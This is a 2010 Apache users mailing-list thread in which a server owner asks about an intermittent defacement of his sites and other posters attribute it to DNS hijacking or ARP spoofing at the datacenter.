virus scanner identified the content as having the Troj/Fujif-Gen
virus, thus, this time I removed active links from the message body so
it is not exactly what I received).

size: 10pt; font-family: Times;">

But the most strange thing was that the problem dissapeared itself! So, it =
last
for 10 minutes then disappeared! And the again started and again dissapeare=
d.
Finally, I turned down apache untill I understand what is going on...

Any idea how could that happen?Â How to reproduce this? How to prevent=
?

Where to look for logs? I have check both ssh logs and apache logs, there i=
s
nothing that could seem unusual there...

Any help is appreciated.

Oleg.

--00151747be44ebd43b04836536c4--

Re: Someone hacked my apache2 server

am 04.04.2010 10:48:47 von Oleg Goryunov

--001517447f1e0ab90904836549b6
Content-Type: text/plain; charset=ISO-8859-1

Lester,
Yes, I assume it might be a third party problem, not my server problem, but
I need to be sure.
If it was not my local DNS hack, since at least two people from different
networks, from different cities (me and another person) observed the same
behavior. Another point is that the hacked page showed up irrespective of
the site name (I have three sites running on a dedicated server in US colo)
on all the sites that are on that server.
Could they have rerouted traffic somewhere closer to the datacenter? I
doubt...
Now, the site looks OK. But I think it can happen again.
Oleg.

On Sun, Apr 4, 2010 at 10:20 AM, Lester Caine wrote:

> Oleg Goryunov wrote:
>
>>
>> Any help is appreciated.
>>
>
> Oleg - Does YOUR copy of the index page look OK reading it as a file?
> What no one has mentioned is that DNC servers have been hacked and could be
> doing the re-routing. It may not be YOUR site which is compromised.
>
> I can view my own sites 'locally' without going through the internet, any
> chance you can check via that route?
>
> If the site itself looks OK, then check the config files for apache are
> still actually looking at that site, but I suspect that because you say it
> is intermittent it may well be outside you control. We have had a number of
> sites giving us a 'problem', but when accessed with the IP address of the
> machine direct then they are actually fine!
>
> --
> Lester Caine - G8HFL
> -----------------------------
> Contact - http://lsces.co.uk/wiki/?page=contact
> L.S.Caine Electronic Services - http://lsces.co.uk
> EnquirySolve - http://enquirysolve.com/
> Model Engineers Digital Workshop - http://medw.co.uk//
> Firebird - http://www.firebirdsql.org/index.php
>
>
> ------------------------------------------------------------ ---------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

--001517447f1e0ab90904836549b6
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Lester,
Yes, I assume it might be a third party problem, not my server p=
roblem, but I need to be sure.
If it was not my local DNS hack, since at=
least two people from different networks, from different cities (me and an=
other person) observed the same behavior. Another point is that the hacked =
page showed up irrespective of the site name (I have three sites running on=
a dedicated server in US colo) on all the sites that are on that server. r>

Could they have rerouted traffic somewhere closer to the datacenter? I doub=
t...
Now, the site looks OK. But I think it can happen again.
Oleg. r>

On Sun, Apr 4, 2010 at 10:20 AM, Leste=
r Caine <lester@=
lsces.co.uk> wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
>Oleg Goryunov wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">

Any help is appreciated.

Oleg - Does YOUR copy of the index page look OK reading it as a file?

What no one has mentioned is that DNC servers have been hacked and could be=
doing the re-routing. It may not be YOUR site which is compromised.

I can view my own sites 'locally' without going through the interne=
t, any chance you can check via that route?

If the site itself looks OK, then check the config files for apache are sti=
ll actually looking at that site, but I suspect that because you say it is =
intermittent it may well be outside you control. We have had a number of si=
tes giving us a 'problem', but when accessed with the IP address of=
the machine direct then they are actually fine!

--

Lester Caine - G8HFL

-----------------------------

Contact - ank">http://lsces.co.uk/wiki/?page=3Dcontact

L.S.Caine Electronic Services - lank">http://lsces.co.uk

EnquirySolve - http:=
//enquirysolve.com/

Model Engineers Digital Workshop - =3D"_blank">http://medw.co.uk//

Firebird - k">http://www.firebirdsql.org/index.php
s=3D"h5">

------------------------------------------------------------ ---------

The official User-To-User support forum of the Apache HTTP Server Project.<=
br>
See <URL: lank">http://httpd.apache.org/userslist.html> for more info.

To unsubscribe, e-mail: g" target=3D"_blank">users-unsubscribe@httpd.apache.org

=A0" =A0 from the digest: httpd.apache.org" target=3D"_blank">users-digest-unsubscribe@httpd.apache.o=
rg

For additional commands, e-mail: org" target=3D"_blank">users-help@httpd.apache.org

--001517447f1e0ab90904836549b6--

Re: Someone hacked my apache2 server

am 04.04.2010 11:41:29 von Oleg Goryunov

--000325554072818112048366056a
Content-Type: text/plain; charset=ISO-8859-1

A good explanation I received from a datacenter where I have the server:

"we classify this sort of issue as "Stealing the gateway". basically
what someone does is they send out false arp packets(flooding the entire
network segment) causing all servers and switching to think their server is
the
gateway instead of our router. they can then insert their own frame inside
of
all web traffic. this sort of issue is usually resolved within a few minutes
when we terminate the server. most likely this is what happened and explains
why the issue started and then suddenly went away without any evidence on
your
server of being hacked."
Unfortunately, they said they did not have a database of registered events
of this kind. :(
Oleg.

On Sun, Apr 4, 2010 at 12:48 PM, Oleg Goryunov wrote:

> Lester,
> Yes, I assume it might be a third party problem, not my server problem, but
> I need to be sure.
> If it was not my local DNS hack, since at least two people from different
> networks, from different cities (me and another person) observed the same
> behavior. Another point is that the hacked page showed up irrespective of
> the site name (I have three sites running on a dedicated server in US colo)
> on all the sites that are on that server.
> Could they have rerouted traffic somewhere closer to the datacenter? I
> doubt...
> Now, the site looks OK. But I think it can happen again.
> Oleg.
>
>
>
> On Sun, Apr 4, 2010 at 10:20 AM, Lester Caine wrote:
>
>> Oleg Goryunov wrote:
>>
>>>
>>> Any help is appreciated.
>>>
>>
>> Oleg - Does YOUR copy of the index page look OK reading it as a file?
>> What no one has mentioned is that DNC servers have been hacked and could
>> be doing the re-routing. It may not be YOUR site which is compromised.
>>
>> I can view my own sites 'locally' without going through the internet, any
>> chance you can check via that route?
>>
>> If the site itself looks OK, then check the config files for apache are
>> still actually looking at that site, but I suspect that because you say it
>> is intermittent it may well be outside you control. We have had a number of
>> sites giving us a 'problem', but when accessed with the IP address of the
>> machine direct then they are actually fine!
>>
>> --
>> Lester Caine - G8HFL
>> -----------------------------
>> Contact - http://lsces.co.uk/wiki/?page=contact
>> L.S.Caine Electronic Services - http://lsces.co.uk
>> EnquirySolve - http://enquirysolve.com/
>> Model Engineers Digital Workshop - http://medw.co.uk//
>> Firebird - http://www.firebirdsql.org/index.php
>>
>>
>> ------------------------------------------------------------ ---------
>> The official User-To-User support forum of the Apache HTTP Server Project.
>> See for more info.
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>> " from the digest: users-digest-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
>>
>

--000325554072818112048366056a
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

A good explanation I received from a datacenter where I have the server: >
"we classify this sort of issue as "Stealing the gateway&quo=
t;. basically

what someone does is they send out false arp packets(flooding the entire >
network segment) causing all servers and switching to think their server is=
the

gateway instead of our router. they can then insert their own frame inside =
of

all web traffic. this sort of issue is usually resolved within a few minute=
s

when we terminate the server. most likely this is what happened and explain=
s

why the issue started and then suddenly went away without any evidence on y=
our

server of being hacked."
Unfortunately, they said they did not have=
a database of registered events of this kind. :(
Oleg.

s=3D"gmail_quote">On Sun, Apr 4, 2010 at 12:48 PM, Oleg Goryunov =3D"ltr"><oleg.goryunov@gmail=
..com> wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Lester,
Yes, I=
assume it might be a third party problem, not my server problem, but I nee=
d to be sure.

If it was not my local DNS hack, since at least two people from different n=
etworks, from different cities (me and another person) observed the same be=
havior. Another point is that the hacked page showed up irrespective of the=
site name (I have three sites running on a dedicated server in US colo) on=
all the sites that are on that server.

Could they have rerouted traffic somewhere closer to the datacenter? I doub=
t...
Now, the site looks OK. But I think it can happen again.
olor=3D"#888888">Oleg.

On Sun, Apr 4, 2010 at 10:20 AM, Lester Caine pan dir=3D"ltr">< >lester@lsces.co.uk> wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Oleg Goryuno=
v wrote:

204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">

Any help is appreciated.

Oleg - Does YOUR copy of the index page look OK reading it as a file?

What no one has mentioned is that DNC servers have been hacked and could be=
doing the re-routing. It may not be YOUR site which is compromised.

I can view my own sites 'locally' without going through the interne=
t, any chance you can check via that route?

If the site itself looks OK, then check the config files for apache are sti=
ll actually looking at that site, but I suspect that because you say it is =
intermittent it may well be outside you control. We have had a number of si=
tes giving us a 'problem', but when accessed with the IP address of=
the machine direct then they are actually fine!

--

Lester Caine - G8HFL

-----------------------------

Contact - ank">http://lsces.co.uk/wiki/?page=3Dcontact

L.S.Caine Electronic Services - lank">http://lsces.co.uk

EnquirySolve - http:=
//enquirysolve.com/

Model Engineers Digital Workshop - =3D"_blank">http://medw.co.uk//

Firebird - k">http://www.firebirdsql.org/index.php

------------------------------------------------------------ ---------

The official User-To-User support forum of the Apache HTTP Server Project.<=
br>
See <URL: lank">http://httpd.apache.org/userslist.html> for more info.

To unsubscribe, e-mail: g" target=3D"_blank">users-unsubscribe@httpd.apache.org

=A0" =A0 from the digest: httpd.apache.org" target=3D"_blank">users-digest-unsubscribe@httpd.apache.o=
rg

For additional commands, e-mail: org" target=3D"_blank">users-help@httpd.apache.org

--000325554072818112048366056a--

Re: Someone hacked my apache2 server

am 04.04.2010 12:17:35 von Lester Caine

Oleg Goryunov wrote:
> A good explanation I received from a datacenter where I have the server:
>
> "we classify this sort of issue as "Stealing the gateway". basically
> what someone does is they send out false arp packets(flooding the entire
> network segment) causing all servers and switching to think their server
> is the
> gateway instead of our router. they can then insert their own frame
> inside of
> all web traffic. this sort of issue is usually resolved within a few minutes
> when we terminate the server. most likely this is what happened and explains
> why the issue started and then suddenly went away without any evidence
> on your
> server of being hacked."
> Unfortunately, they said they did not have a database of registered
> events of this kind. :(

The problem is detecting the problem TO log it. Often it's outside the actual
data centre. Firebird had it's website being redirected, but only on a couple of
DNS servers, everybody else saw the correct IP address. Your description of 'all
sites' simply confirms that your users are getting the wrong DNS lookup, rather
than YOUR site having been compromised.

--
Lester Caine - G8HFL
-----------------------------
Contact - http://lsces.co.uk/wiki/?page=contact
L.S.Caine Electronic Services - http://lsces.co.uk
EnquirySolve - http://enquirysolve.com/
Model Engineers Digital Workshop - http://medw.co.uk//
Firebird - http://www.firebirdsql.org/index.php

------------------------------------------------------------ ---------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: Someone hacked my apache2 server

am 04.04.2010 18:10:16 von Morgan Gangwere

On 4/4/2010 4:17 AM, Lester Caine wrote:
[a bunch of CHARs]

Looking that the logs that were posted, there's nothing out of the
ordinary, just people hammering a server for attempts in.

This is more and more looking like a DNS attack.
--

Morgan Gangwere

>> Why?
> Because it breaks the logical flow of conversation, plus makes
messages unreadable.
>>> Top-Posting is evil.

------------------------------------------------------------ ---------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org